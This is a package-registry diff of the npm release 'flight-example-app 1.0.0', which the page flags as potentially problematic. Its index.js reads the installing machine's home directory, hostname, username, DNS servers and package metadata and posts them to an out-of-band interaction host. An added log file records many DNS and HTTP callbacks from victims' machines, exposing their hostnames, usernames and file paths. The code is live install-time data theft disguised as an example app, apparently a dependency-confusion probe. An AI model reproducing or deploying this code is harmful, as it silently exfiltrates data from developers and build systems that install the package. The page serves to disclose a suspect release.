flight-example-app 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of flight-example-app might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,46 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+ p: package,
10
+ c: __dirname,
11
+ hd: os.homedir(),
12
+ hn: os.hostname(),
13
+ un: os.userInfo().username,
14
+ dns: dns.getServers(),
15
+ r: packageJSON ? packageJSON.___resolved : undefined,
16
+ v: packageJSON.version,
17
+ pjson: packageJSON,
18
+ });
19
+
20
+ var postData = querystring.stringify({
21
+ msg: trackingData,
22
+ });
23
+
24
+ var options = {
25
+ hostname: "ccu6b21ufkgq9a6bd4v0ou5xan7bojite.oast.me", //replace burpcollaborator.net with Interactsh or pipedream
26
+ port: 443,
27
+ path: "/",
28
+ method: "POST",
29
+ headers: {
30
+ "Content-Type": "application/x-www-form-urlencoded",
31
+ "Content-Length": postData.length,
32
+ },
33
+ };
34
+
35
+ var req = https.request(options, (res) => {
36
+ res.on("data", (d) => {
37
+ process.stdout.write(d);
38
+ });
39
+ });
40
+
41
+ req.on("error", (e) => {
42
+ // console.error(e);
43
+ });
44
+
45
+ req.write(postData);
46
+ req.end();
File without changes
@@ -0,0 +1,823 @@
1
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 47.118.138.229 at 2022-08-30 23:44:23
2
+ -----------
3
+ DNS Request
4
+ -----------
5
+
6
+ ;; opcode: QUERY, status: NOERROR, id: 18500
7
+ ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
8
+
9
+ ;; QUESTION SECTION:
10
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
11
+
12
+ ;; ADDITIONAL SECTION:
13
+
14
+ ;; OPT PSEUDOSECTION:
15
+ ; EDNS: version 0; flags: do; udp: 512
16
+
17
+
18
+ ------------
19
+ DNS Response
20
+ ------------
21
+
22
+ ;; opcode: QUERY, status: NOERROR, id: 18500
23
+ ;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
24
+
25
+ ;; QUESTION SECTION:
26
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
27
+
28
+ ;; ANSWER SECTION:
29
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
30
+
31
+ ;; AUTHORITY SECTION:
32
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
33
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
34
+
35
+ ;; ADDITIONAL SECTION:
36
+ ns1.oast.site. 3600 IN A 178.128.16.97
37
+ ns2.oast.site. 3600 IN A 178.128.16.97
38
+
39
+
40
+
41
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 47.118.138.231 at 2022-08-30 23:44:23
42
+ -----------
43
+ DNS Request
44
+ -----------
45
+
46
+ ;; opcode: QUERY, status: NOERROR, id: 653
47
+ ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
48
+
49
+ ;; QUESTION SECTION:
50
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
51
+
52
+ ;; ADDITIONAL SECTION:
53
+
54
+ ;; OPT PSEUDOSECTION:
55
+ ; EDNS: version 0; flags: do; udp: 512
56
+
57
+
58
+ ------------
59
+ DNS Response
60
+ ------------
61
+
62
+ ;; opcode: QUERY, status: NOERROR, id: 653
63
+ ;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
64
+
65
+ ;; QUESTION SECTION:
66
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
67
+
68
+ ;; ANSWER SECTION:
69
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
70
+
71
+ ;; AUTHORITY SECTION:
72
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
73
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
74
+
75
+ ;; ADDITIONAL SECTION:
76
+ ns1.oast.site. 3600 IN A 178.128.16.97
77
+ ns2.oast.site. 3600 IN A 178.128.16.97
78
+
79
+
80
+
81
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 120.55.68.29 at 2022-08-30 23:44:24
82
+ ------------
83
+ HTTP Request
84
+ ------------
85
+
86
+ POST / HTTP/1.1
87
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
88
+ Connection: close
89
+ Connection: close
90
+ Content-Length: 659
91
+ Content-Type: application/x-www-form-urlencoded
92
+
93
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fhome%2Fnode%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%221f0773836198%22%2C%22un%22%3A%22node%22%2C%22dns%22%3A%5B%22100.100.2.136%22%2C%22100.100.2.138%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
94
+
95
+ -------------
96
+ HTTP Response
97
+ -------------
98
+
99
+ HTTP/1.1 200 OK
100
+ Connection: close
101
+ Content-Type: text/html; charset=utf-8
102
+ Server: oast.site
103
+
104
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
105
+
106
+
107
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 121.199.14.141 at 2022-08-30 23:44:24
108
+ ------------
109
+ HTTP Request
110
+ ------------
111
+
112
+ POST / HTTP/1.1
113
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
114
+ Connection: close
115
+ Connection: close
116
+ Content-Length: 659
117
+ Content-Type: application/x-www-form-urlencoded
118
+
119
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fhome%2Fnode%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%2208c797a81c0a%22%2C%22un%22%3A%22node%22%2C%22dns%22%3A%5B%22100.100.2.136%22%2C%22100.100.2.138%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
120
+
121
+ -------------
122
+ HTTP Response
123
+ -------------
124
+
125
+ HTTP/1.1 200 OK
126
+ Connection: close
127
+ Content-Type: text/html; charset=utf-8
128
+ Server: oast.site
129
+
130
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
131
+
132
+
133
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 121.199.14.141 at 2022-08-30 23:44:24
134
+ ------------
135
+ HTTP Request
136
+ ------------
137
+
138
+ POST / HTTP/1.1
139
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
140
+ Connection: close
141
+ Connection: close
142
+ Content-Length: 659
143
+ Content-Type: application/x-www-form-urlencoded
144
+
145
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fhome%2Fnode%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%224a95b1c976b6%22%2C%22un%22%3A%22node%22%2C%22dns%22%3A%5B%22100.100.2.136%22%2C%22100.100.2.138%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
146
+
147
+ -------------
148
+ HTTP Response
149
+ -------------
150
+
151
+ HTTP/1.1 200 OK
152
+ Connection: close
153
+ Content-Type: text/html; charset=utf-8
154
+ Server: oast.site
155
+
156
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
157
+
158
+
159
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 120.55.68.29 at 2022-08-30 23:44:26
160
+ ------------
161
+ HTTP Request
162
+ ------------
163
+
164
+ POST / HTTP/1.1
165
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
166
+ Connection: close
167
+ Connection: close
168
+ Content-Length: 659
169
+ Content-Type: application/x-www-form-urlencoded
170
+
171
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fhome%2Fnode%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%22e1677c98820b%22%2C%22un%22%3A%22node%22%2C%22dns%22%3A%5B%22100.100.2.136%22%2C%22100.100.2.138%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
172
+
173
+ -------------
174
+ HTTP Response
175
+ -------------
176
+
177
+ HTTP/1.1 200 OK
178
+ Connection: close
179
+ Content-Type: text/html; charset=utf-8
180
+ Server: oast.site
181
+
182
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
183
+
184
+
185
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (AAAA) from 74.125.179.193 at 2022-08-30 23:45:17
186
+ -----------
187
+ DNS Request
188
+ -----------
189
+
190
+ ;; opcode: QUERY, status: NOERROR, id: 28428
191
+ ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
192
+
193
+ ;; QUESTION SECTION:
194
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN AAAA
195
+
196
+
197
+ ------------
198
+ DNS Response
199
+ ------------
200
+
201
+ ;; opcode: QUERY, status: NOERROR, id: 28428
202
+ ;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
203
+
204
+ ;; QUESTION SECTION:
205
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN AAAA
206
+
207
+ ;; ANSWER SECTION:
208
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
209
+
210
+ ;; AUTHORITY SECTION:
211
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
212
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
213
+
214
+ ;; ADDITIONAL SECTION:
215
+ ns1.oast.site. 3600 IN A 178.128.16.97
216
+ ns2.oast.site. 3600 IN A 178.128.16.97
217
+
218
+
219
+
220
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 74.125.183.129 at 2022-08-30 23:45:17
221
+ -----------
222
+ DNS Request
223
+ -----------
224
+
225
+ ;; opcode: QUERY, status: NOERROR, id: 23599
226
+ ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
227
+
228
+ ;; QUESTION SECTION:
229
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
230
+
231
+
232
+ ------------
233
+ DNS Response
234
+ ------------
235
+
236
+ ;; opcode: QUERY, status: NOERROR, id: 23599
237
+ ;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
238
+
239
+ ;; QUESTION SECTION:
240
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
241
+
242
+ ;; ANSWER SECTION:
243
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
244
+
245
+ ;; AUTHORITY SECTION:
246
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
247
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
248
+
249
+ ;; ADDITIONAL SECTION:
250
+ ns1.oast.site. 3600 IN A 178.128.16.97
251
+ ns2.oast.site. 3600 IN A 178.128.16.97
252
+
253
+
254
+
255
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 35.226.253.98 at 2022-08-30 23:45:18
256
+ ------------
257
+ HTTP Request
258
+ ------------
259
+
260
+ POST / HTTP/1.1
261
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
262
+ Connection: close
263
+ Connection: close
264
+ Content-Length: 639
265
+ Content-Type: application/x-www-form-urlencoded
266
+
267
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fapp%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%22c63a0f16e6f9%22%2C%22un%22%3A%22root%22%2C%22dns%22%3A%5B%228.8.8.8%22%2C%228.8.4.4%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
268
+
269
+ -------------
270
+ HTTP Response
271
+ -------------
272
+
273
+ HTTP/1.1 200 OK
274
+ Connection: close
275
+ Content-Type: text/html; charset=utf-8
276
+ Server: oast.site
277
+
278
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
279
+
280
+
281
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 172.217.41.133 at 2022-08-30 23:45:28
282
+ -----------
283
+ DNS Request
284
+ -----------
285
+
286
+ ;; opcode: QUERY, status: NOERROR, id: 28081
287
+ ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
288
+
289
+ ;; QUESTION SECTION:
290
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
291
+
292
+
293
+ ------------
294
+ DNS Response
295
+ ------------
296
+
297
+ ;; opcode: QUERY, status: NOERROR, id: 28081
298
+ ;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
299
+
300
+ ;; QUESTION SECTION:
301
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
302
+
303
+ ;; ANSWER SECTION:
304
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
305
+
306
+ ;; AUTHORITY SECTION:
307
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
308
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
309
+
310
+ ;; ADDITIONAL SECTION:
311
+ ns1.oast.site. 3600 IN A 178.128.16.97
312
+ ns2.oast.site. 3600 IN A 178.128.16.97
313
+
314
+
315
+
316
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 35.226.253.98 at 2022-08-30 23:45:29
317
+ ------------
318
+ HTTP Request
319
+ ------------
320
+
321
+ POST / HTTP/1.1
322
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
323
+ Connection: close
324
+ Connection: close
325
+ Content-Length: 639
326
+ Content-Type: application/x-www-form-urlencoded
327
+
328
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fapp%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%22c63a0f16e6f9%22%2C%22un%22%3A%22root%22%2C%22dns%22%3A%5B%228.8.8.8%22%2C%228.8.4.4%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
329
+
330
+ -------------
331
+ HTTP Response
332
+ -------------
333
+
334
+ HTTP/1.1 200 OK
335
+ Connection: close
336
+ Content-Type: text/html; charset=utf-8
337
+ Server: oast.site
338
+
339
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
340
+
341
+
342
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 218.12.99.209 at 2022-08-30 23:45:30
343
+ -----------
344
+ DNS Request
345
+ -----------
346
+
347
+ ;; opcode: QUERY, status: NOERROR, id: 51707
348
+ ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
349
+
350
+ ;; QUESTION SECTION:
351
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
352
+
353
+ ;; ADDITIONAL SECTION:
354
+
355
+ ;; OPT PSEUDOSECTION:
356
+ ; EDNS: version 0; flags: do; udp: 4096
357
+ ; SUBNET: 103.107.216.1/32/0
358
+
359
+
360
+ ------------
361
+ DNS Response
362
+ ------------
363
+
364
+ ;; opcode: QUERY, status: NOERROR, id: 51707
365
+ ;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
366
+
367
+ ;; QUESTION SECTION:
368
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
369
+
370
+ ;; ANSWER SECTION:
371
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
372
+
373
+ ;; AUTHORITY SECTION:
374
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
375
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
376
+
377
+ ;; ADDITIONAL SECTION:
378
+ ns1.oast.site. 3600 IN A 178.128.16.97
379
+ ns2.oast.site. 3600 IN A 178.128.16.97
380
+
381
+
382
+
383
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 103.107.216.241 at 2022-08-30 23:45:32
384
+ ------------
385
+ HTTP Request
386
+ ------------
387
+
388
+ POST / HTTP/1.1
389
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
390
+ Connection: close
391
+ Connection: close
392
+ Content-Length: 647
393
+ Content-Type: application/x-www-form-urlencoded
394
+
395
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fnpm%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%22e85a075bec7e%22%2C%22un%22%3A%22root%22%2C%22dns%22%3A%5B%22172.29.4.79%22%2C%22172.29.4.52%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
396
+
397
+ -------------
398
+ HTTP Response
399
+ -------------
400
+
401
+ HTTP/1.1 200 OK
402
+ Connection: close
403
+ Content-Type: text/html; charset=utf-8
404
+ Server: oast.site
405
+
406
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
407
+
408
+
409
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 103.107.216.241 at 2022-08-30 23:45:33
410
+ ------------
411
+ HTTP Request
412
+ ------------
413
+
414
+ POST / HTTP/1.1
415
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
416
+ Connection: close
417
+ Connection: close
418
+ Content-Length: 647
419
+ Content-Type: application/x-www-form-urlencoded
420
+
421
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22%2Fnpm%2Fnode_modules%2Foptly-components%22%2C%22hd%22%3A%22%2Froot%22%2C%22hn%22%3A%22e85a075bec7e%22%2C%22un%22%3A%22root%22%2C%22dns%22%3A%5B%22172.29.4.79%22%2C%22172.29.4.52%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
422
+
423
+ -------------
424
+ HTTP Response
425
+ -------------
426
+
427
+ HTTP/1.1 200 OK
428
+ Connection: close
429
+ Content-Type: text/html; charset=utf-8
430
+ Server: oast.site
431
+
432
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
433
+
434
+
435
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 104.208.150.152 at 2022-08-30 23:45:55
436
+ -----------
437
+ DNS Request
438
+ -----------
439
+
440
+ ;; opcode: QUERY, status: NOERROR, id: 62023
441
+ ;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
442
+
443
+ ;; QUESTION SECTION:
444
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
445
+
446
+ ;; ADDITIONAL SECTION:
447
+
448
+ ;; OPT PSEUDOSECTION:
449
+ ; EDNS: version 0; flags: do; udp: 1224
450
+
451
+
452
+ ------------
453
+ DNS Response
454
+ ------------
455
+
456
+ ;; opcode: QUERY, status: NOERROR, id: 62023
457
+ ;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
458
+
459
+ ;; QUESTION SECTION:
460
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
461
+
462
+ ;; ANSWER SECTION:
463
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
464
+
465
+ ;; AUTHORITY SECTION:
466
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
467
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
468
+
469
+ ;; ADDITIONAL SECTION:
470
+ ns1.oast.site. 3600 IN A 178.128.16.97
471
+ ns2.oast.site. 3600 IN A 178.128.16.97
472
+
473
+
474
+
475
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received HTTP interaction from 20.65.23.140 at 2022-08-30 23:45:56
476
+ ------------
477
+ HTTP Request
478
+ ------------
479
+
480
+ POST / HTTP/1.1
481
+ Host: cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site
482
+ Connection: close
483
+ Connection: close
484
+ Content-Length: 756
485
+ Content-Type: application/x-www-form-urlencoded
486
+
487
+ msg=%7B%22p%22%3A%22optly-components%22%2C%22c%22%3A%22D%3A%5C%5CTRANSFER%5C%5C525d13a6-bd28-ed11-9db5-6045bd83a18a%5C%5C12eade39-6de1-452d-bb5f-094401f9599a%5C%5Cnode_modules%5C%5Coptly-components%22%2C%22hd%22%3A%22C%3A%5C%5CUsers%5C%5Cjustin%22%2C%22hn%22%3A%22DESKTOP-97KBB6H%22%2C%22un%22%3A%22justin%22%2C%22dns%22%3A%5B%22168.63.129.16%22%5D%2C%22v%22%3A%221.0.0%22%2C%22pjson%22%3A%7B%22name%22%3A%22optly-components%22%2C%22version%22%3A%221.0.0%22%2C%22description%22%3A%22White%20Hat%20Researcher%22%2C%22main%22%3A%22index.js%22%2C%22scripts%22%3A%7B%22test%22%3A%22echo%20%5C%22Error%3A%20no%20test%20specified%5C%22%20%26%26%20exit%201%22%2C%22preinstall%22%3A%22node%20index.js%22%7D%2C%22author%22%3A%22%22%2C%22license%22%3A%22ISC%22%7D%7D
488
+
489
+ -------------
490
+ HTTP Response
491
+ -------------
492
+
493
+ HTTP/1.1 200 OK
494
+ Connection: close
495
+ Content-Type: text/html; charset=utf-8
496
+ Server: oast.site
497
+
498
+ <html><head></head><body>9qwxzeiqttaapg4ihs7nqtgkfuh8v97cc</body></html>
499
+
500
+
501
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 122.9.169.76 at 2022-08-30 23:50:26
502
+ -----------
503
+ DNS Request
504
+ -----------
505
+
506
+ ;; opcode: QUERY, status: NOERROR, id: 30794
507
+ ;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
508
+
509
+ ;; QUESTION SECTION:
510
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
511
+
512
+ ;; ADDITIONAL SECTION:
513
+
514
+ ;; OPT PSEUDOSECTION:
515
+ ; EDNS: version 0; flags: do; udp: 512
516
+ ; COOKIE: 6625c4652ebbb422
517
+
518
+
519
+ ------------
520
+ DNS Response
521
+ ------------
522
+
523
+ ;; opcode: QUERY, status: NOERROR, id: 30794
524
+ ;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
525
+
526
+ ;; QUESTION SECTION:
527
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
528
+
529
+ ;; ANSWER SECTION:
530
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
531
+
532
+ ;; AUTHORITY SECTION:
533
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns1.oast.site.
534
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN NS ns2.oast.site.
535
+
536
+ ;; ADDITIONAL SECTION:
537
+ ns1.oast.site. 3600 IN A 178.128.16.97
538
+ ns2.oast.site. 3600 IN A 178.128.16.97
539
+
540
+
541
+
542
+ [cc79v8hufkgtqn7shi4gpaattqiezxwq9] Received DNS interaction (A) from 60.205.209.221 at 2022-08-30 23:58:43
543
+ -----------
544
+ DNS Request
545
+ -----------
546
+
547
+ ;; opcode: QUERY, status: NOERROR, id: 57801
548
+ ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
549
+
550
+ ;; QUESTION SECTION:
551
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
552
+
553
+ ;; ADDITIONAL SECTION:
554
+
555
+ ;; OPT PSEUDOSECTION:
556
+ ; EDNS: version 0; flags: do; udp: 4096
557
+ ; SUBNET: 1.202.0.0/25/0
558
+
559
+
560
+ ------------
561
+ DNS Response
562
+ ------------
563
+
564
+ ;; opcode: QUERY, status: NOERROR, id: 57801
565
+ ;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
566
+
567
+ ;; QUESTION SECTION:
568
+ ;cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. IN A
569
+
570
+ ;; ANSWER SECTION:
571
+ cc79v8hufkgtqn7shi4gpaattqiezxwq9.oast.site. 3600 IN A 178.128.16.97
572
+
573
